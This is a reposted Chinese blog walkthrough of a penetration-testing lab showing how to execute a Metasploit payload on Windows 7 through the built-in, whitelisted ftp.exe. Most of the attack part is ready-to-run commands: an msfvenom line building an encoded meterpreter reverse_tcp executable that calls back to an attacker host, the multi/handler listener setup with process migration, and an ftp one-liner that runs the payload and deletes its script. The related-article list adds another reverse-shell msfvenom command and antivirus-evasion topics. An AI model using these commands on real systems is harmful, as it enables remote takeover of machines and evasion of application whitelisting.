渗透测试=基于白名单执行payload--Ftp

最新推荐文章于 2021-06-24 18:55:43 发布
最新推荐文章于 2021-06-24 18:55:43 发布
阅读量112 收藏
点赞数
原文链接:http://www.cnblogs.com/-qing-/p/10771100.html
版权

还是自己动手复现亮神课程的过程。

 

环境 靶机win7

攻击机 kali

 

Ftp.exe简介:

Ftp.exe是Windows本身自带的一个程序,属于微软TP工具,提供基本的FTP访问

说明:Ftp.exe所在路径已被系统添PATH环境

 

 

 

 

Windows 2003 默认位置:

C:\Windows\System32\ftp.exe

C:\Windows\SysWOW64\ftp.exe

Windows 7 默认位置:

C:\Windows\System32\ftp.exe

C:\Windows\SysWOW64\ftp.exe

 

 

 

 

1、首先攻击机msfvenom生成一个反弹马 

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.190.141 LPORT=4444 -f exe > ./1.exe

 

 

 

 

2、然后攻击机kali开启监听模块

注:需设置参数set AutoRunScript migrate -f  (AutoRunScriptmsf中一个强大的自动化的后渗透工具,这里migrate参数是迁移木马到其他进程)

 

use exploit/multi/handler/

set payload windows/meterpreter/reverse_tcp

set AutoRunScript migrate -f

set LHOST 192.168.190.141

set LPORT 4444

exploit

 

 

 

 

 

3、靶机通过ftp执行木马

 

echo !C:\1.exe > o &echo quit >> o &ft

p ‐n ‐s:o &del /F /Q o

 

Ps:(>符号是重定向文件,>>是追加文件内容,ftp命令中-n是禁止在初始连接时自动登录,-s是读取并执行有ftp命令的文件,del命令中/F是强制删除,/Q是安静模式,删除时不需要确认)

 

 

 

 

 

 

 

这里容易卡死 多试一次即可~

 

转载于:https://www.cnblogs.com/-qing-/p/10771100.html

weixin_30292745
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
渗透中Poc、Exp、Payload、Rce与Shellcode的区别
墨痕诉清风的博客
10-28 3686
备注:感谢原作者,本文只为备份学习资料。 PoC,全称”Proof of Concept”,中文“概念验证”,常指一段漏洞证明的代码。 Exp,全称”Exploit”,中文“利用”,指利用系统漏洞进行攻击的动作。 Payload,中文“有效载荷”,指成功exploit之后,真正在目标系统执行的代码或指令。 Shellcode,简单翻译“shell代码”,是Payload的一种,由于其建立正...
黑盒 Payload 生成技法.pdf
10-30
黑盒 Payload 生成技法.pdf
在渗透中poc exp payload shellcode的具体含义(小宇特详解)
小宇的web博客
06-24 1992
在渗透中poc exp payload shellcode的具体含义(小宇特详解) 具体含义 1.POC:全称 ’ Proof of Concept ',中文 ’ 概念验证 ’ ,常指一段漏洞证明的代码。 2.EXP:全称 ’ Exploit ',中文 ’ 利用 ',指利用系统漏洞进行攻击的动作。 3.Payload:中文 ’ 有效载荷 ',指成功exploit之后,真正在目标系统执行的代码或指令。 4.Shellcode:简单翻译 ’ shell代码 ',是Payload的一种,由于其建立正向/反向she
对亮神基于白名单ftp执行payload第十九季复现
cxk
05-06 310
0x00 Ftp.exe简介: Ftp.exe是Windows本身自带的一个程序,属于微软FTP工具,提供基本的FTP访问。 0x01 环境 攻击机 kali 192.168.5.102 靶机 win7 192.168.5.101 装有av 0x02复现 攻击机,注意配置set AutoRunScript migrate f 靶机echo !C:\Users\administrator\Des...
payload-dumper-go.exe
10-30
payload.bin文件分解比市面上那些PY分解速度快一倍,执行命令在CMD执行payload-dumper-go payload.bin,输出目录和单独提取某个IMG都可以设置,输出目录-o,单独输出某个IMG是-P就能得到分解.小米11分解payload.bin...
payload-dumper-win64
11-13
3. **payload_input** - 可能是一个示例或测试输入文件,用于展示如何向payload-dumper提供数据,或者是一个存储了待处理payload数据的文件。 4. **payload_output** - 这个文件可能是工具运行后的输出结果,例如...
第八十四课:基于白名单Forfiles执行payload第十四季.docx
09-15
第八十四课:基于白名单Forfiles执行payload第十四季.docx
第八十课:基于白名单Wmic执行payload第十季.docx
09-15
第八十课:基于白名单Wmic执行payload第十季.docx
payload-dumper-解包
03-22
在IT行业中,"payload-dumper-解包"这个主题涉及到的是对特定文件格式的解析,尤其是针对payload.bin文件。Payload.bin通常是一种二进制文件,它可能包含各种系统数据、固件更新或者其他形式的执行代码,用于在目标...
渗透-payload分离免杀
Adminxe的博客
05-04 576
shellcode loader 借助第三方加载器,将shellcode加载到内存中来执行。 https://github.com/clinicallyinane/shellcode_launcher msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=172.16.1.130 lport=4444 -e x86/shikata_g...
MetaSploit常用漏洞payload网址
一杯咖啡的渗透记忆
05-21 968
http://www.rapid7.com/db/searchhttp://www.exploit-db.com/search/http://osvdb.org/search/advsearch
渗透测试-基于白名单执行payload--Forfiles
weixin_30555125的博客
05-02 118
0x01 Forfiles简介: Forfiles为Windows默认安装的文件操作搜索工具之一,可根据日期,后缀名,修改日期为条件。常与批处理配合使用。 微软官方文档:https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc753551(v=w...
metasploit学习之路(三) exploit+payload攻击载荷+metepreter(介绍)
Sea_Sand息禅
07-07 2211
一、exploit介绍 exploit是利用漏洞对目标进行攻击的模块,通过信息的手机及漏洞的验证等,使用相应的exploit对目标机进行漏洞攻击。也就是我么常说的漏洞利用exp。 exploit可有主动和被动两种。 主动:利用合适的exploit对目标机进行攻击 被动:类似于钓鱼,等待用户对我们的诱饵链接等进行操作我们才能攻击成功。 二、payload介绍 payload是msf生成的有效载荷,可...
手把手教你如何利用Meterpreter渗透Windows系统
weixin_34384557的博客
11-30 682
在这篇文章中,我们将跟大家介绍如何使用Meterpreter来收集目标Windows系统中的信息,获取用户凭证,创建我们自己的账号,启用远程桌面,进行屏幕截图,以及获取用户键盘记录等等。 相关Payload Payload中包含有需要在远程系统中运行的恶意代码,而在Metasploit中Payload是一种特殊模块,它们能够以漏洞利用模块运行,并能够利用目标系统中的安全漏洞实施攻击。简而言之,这...
渗透测试之免杀payload攻击
buran的博客
03-29 770
安装Veil Evasion工具 Kali中默认是没有安装Veil 的,安装命令: apt-get install veil-evasion -y 接着初始化该工具: veil 这里按照提示安装好所需的其他软件即可,初始化成功后,命令行会显示“Done”,如果有任何错误,则可以运行 /Veil.py --setup 命令。 生成免杀Payload 启动Veil Evasion工具: veil //启动之后命令行提示符为: Veil> use Evasion //veil 有两个功能模块,Eva
WEB漏洞测试payload整理
nextdoor6的博客
12-14 9463
常用web漏洞测试的payload整理,把写的一个类sqlmap的web安全漏洞测试工具的Payload整理下来,供大家测试时参考。 [反射型xss] [在html形成] "'>document.title="[random]"; document.title="[random]"; [在js形成] document.title="[random]";// ;document.titl
渗透中POC、EXP、Payload与Shellcode的区别
热门推荐
浅浅的博客
06-17 3万+
1. POC、EXP、Payload与Shellcode POC:全称 ' Proof of Concept ',中文 ' 概念验证 ' ,常指一段漏洞证明的代码。 EXP:全称 ' Exploit ',中文 ' 利用 ',指利用系统漏洞进行攻击的动作。 Payload:中文 ' 有效载荷 ',指成功exploit之后,真正在目标系统执行的代码或指令。 Shellcode:简单翻译 ' ...
漏洞payload 靶机_靶机渗透测试--hack the wakanda
weixin_29547309的博客
12-23 905
大家好,本文向大家介绍一个CTF挑战靶机Wakanda,下载地址在这里。该靶机难度适中,共有三个flag(flag1.txt,flag2.txt和root.txt)。渗透测试方法如下网络扫描(Nmap,netdiscover)HTTP服务遍历Php filter协议利用LFI漏洞密码base64解码SSH登陆获取第一个flag查找属于devops用户的文件Antivirus.py文件写入恶意pyt...
--payload-delimiter
最新发布
03-28
payload-delimiter是一种用于分隔数据包中不同部分的特殊字符或字符串。它在通信协议或数据格式中起到标记不同数据段的作用,以便接收方可以正确解析和处理数据。 在网络通信中,payload-delimiter可以用于分隔不同...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值